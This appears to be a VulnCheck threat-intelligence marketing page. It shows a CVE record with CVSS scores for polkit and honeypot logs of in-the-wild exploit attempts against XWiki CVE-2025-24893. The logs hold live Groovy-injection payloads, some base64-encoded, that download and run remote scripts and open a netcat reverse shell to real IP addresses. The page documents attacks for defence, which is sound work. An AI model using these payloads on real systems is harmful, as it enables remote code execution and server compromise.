"cpe:2.3:a:polkit_project:polkit:-:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.100:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.101:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.102:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.103:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.104:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.105:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.106:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.107:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.108:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.109:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.110:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.111:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.112.1:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.112:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.113:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.114:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.115:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.116:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.117:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.118:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.119:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.120:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.5:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.6:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.7:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.8:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.91:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.92:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.93:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.94:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.95:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.96:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.97:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.98:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.99:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.9:*:*:*:*:*:*:*",
"cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.6:*:*:*:*:*:*:*",
"cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.7:*:*:*:*:*:*:*",
"cpe:2.3:a:siemens:sinumerik_edge:3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:starwindsoftware:command_center:1.0:update3_build5871:*:*:*:*:*:*",
"cpe:2.3:a:starwindsoftware:starwind_hyperconverged_appliance:-:*:*:*:*:*:*:*",
"cpe:2.3:a:starwindsoftware:starwind_virtual_san:v8:build14338:*:*:*:*:*:*",
"cpe:2.3:a:suse:enterprise_storage:7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:suse:linux_enterprise_high_performance_computing:15.0:sp2:*:*:-:*:*:*",
"cpe:2.3:a:suse:manager_proxy:4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:suse:manager_server:4.1:*:*:*:*:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:21.10:*:*:*:-:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:-:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:advanced_virtualization:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:coreos:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.1:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:x86:*",
"cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_eus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:siemens:scalance_lpe9403_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:o:suse:linux_enterprise_desktop:15:sp2:*:*:*:*:*:*",
"cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:-:*:*",
"cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:sap:*:*",
"cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:business_critical_linux:-:*:*",
"cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp5:*:*:*:*:*:*"
],
"impact": {
"baseMetricV3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9
},
"baseMetricV2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"accessVector": "LOCAL",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2
},
"severity": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 10,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"temporalMetricV3": {
"cvssV3": {
"version": "3.1",
"vectorString": "E:H/RL:X/RC:C",
"exploitCodeMaturity": "HIGH",
"remediationLevel": "NOT_DEFINED",
"reportConfidence": "CONFIRMED",
"temporalScore": 7.8
}
},
"temporalMetricV2": {
"cvssV2": {
"version": "2.0",
"vectorString": "E:H/RL:ND/RC:C",
"exploitability": "HIGH",
"remediationLevel": "NOT_DEFINED",
"reportConfidence": "CONFIRMED",
"temporalScore": 7.2
}
},
"epss": {
"epss_score": 0.04106,
"epss_percentile": 0.85572
}
},
"related_attack_patterns": [
{
"lang": "en",
"capec_id": "CAPEC-100",
"capec_name": "Overflow Buffers",
"capec_url": "https://capec.mitre.org/data/definitions/100.html"
}
],
"publishedDate": "2022-01-28T20:15Z",
"lastModifiedDate": "2022-10-25T16:59Z",
"documentGenerationDate": "2022-11-15T15:26Z"
}
]
}
Canary Intelligence
Canary Intelligence data on attempted and successful attempts at vulnerability exploitation in-the-wild.
- Providing early visibility into active threats targeting the Internet and critical infrastructure.
- Campaigns, and infrastructure, enabling meaningful attribution and intelligence production.
- Guide cyber operations, and maintain a decisive operational advantage.
GET /v3/index/vulncheck-canaries
[
{
"src_ip": "193.26.115.195",
"src_port": 47922,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlNUIlMjdzaCUyNyUyQyUyMCUyNy1jJTI3JTJDJTIwJTI3d2dldCUyMC1xTy0lMjBodHRwJTNBJTJGJTJGNzQuMTk0LjE5MS41MiUyRnJvbmRvLnNkdS5zaCU3Q3NoJTI3JTVELmV4ZWN1dGUlMjglMjkudGV4dCU3QiU3QiUyRmdyb292eSU3RCU3RCU3QiU3QiUyRmFzeW5jJTdEJTdEIEhUVFAvMS4xDQpIb3N0OiBWQ19SRURBQ1RFRA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKGJhbmcyMDEzQGF0b21pY21haWwuaW8pDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
"http_user_agent": "Mozilla/5.0 (bang2013@atomicmail.io)",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-07T07:58:51.064Z"
},
{
"src_ip": "172.206.196.45",
"src_port": 51864,
"src_country": "US",
"dst_country": "CA",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN2QlN2QlN2QlN2IlN2Jhc3luYyUyMGFzeW5jJTNkZmFsc2UlN2QlN2QlN2IlN2Jncm9vdnklN2QlN2RwcmludGxuKCUyMndnZXQlMjBodHRwOi8vOTAuMTU2LjIxOC4zMTo4MDgwL1ZreTBiNEo5SzMveDY0MCUyMC1PJTIwL3RtcC9mMWM1ZiUyMi5leGVjdXRlKCkudGV4dCklN2IlN2IlMmZncm9vdnklN2QlN2QlN2IlN2IlMmZhc3luYyU3ZCU3ZCUyMCBIVFRQLzEuMQ0KSG9zdDogVkNfUkVEQUNURUQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzcpIEFwcGxlV2ViS2l0LzYwNS4xLjE1IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi8xNi40LjEgU2FmYXJpLzYwNS4xLjE1DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4NCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22wget%20http://90.156.218.31:8080/Vky0b4J9K3/x640%20-O%20/tmp/f1c5f%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
"http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-01T12:14:26.712Z"
},
{
"src_ip": "18.228.3.224",
"src_port": 37348,
"src_country": "BR",
"dst_country": "FR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJidXN5Ym94JTIwbmMlMjAxOC4yMjguMy4yMjQlMjA4NDQzJTIwLWUlMjAvYmluL2Jhc2glMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2018.228.3.224%208443%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
"http_user_agent": "python-requests/2.32.4",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-31T10:16:30.275Z"
}
]
Partnering With Agencies
How VulnCheck Partners with Government Agencies
Government Use Cases
VulnCheck supports a wide variety of Government use cases.
- Vulnerability Intelligence
- Active Cyber Defense
- Mass Exploitation Defense
- Vulnerability Prioritization
- Adversary Cyber Intelligence
- Emerging Threat Response
See More with VulnCheck
VulnCheck works closely with government agencies to solidify defenses, collaborate, and respond to emerging threats.
- US Intelligence Community
- US Department of Defense
- Civilian Agencies
- National CERTs
- International Intelligence Agencies
- NATO and Friendly Allies
Ready to get Started?
Explore VulnCheck, a next-generation Cyber Threat Intelligence platform, which provides exploit and vulnerability intelligence to help you prioritize and remediate vulnerabilities that matter.
- Vulnerability PrioritizationPrioritize vulnerabilities that matter based on the threat landscape and defer vulnerabilities that don't.
- Early Warning SystemReal-time alerting of changes in the vulnerability landscape so that you can take action before the attacks start.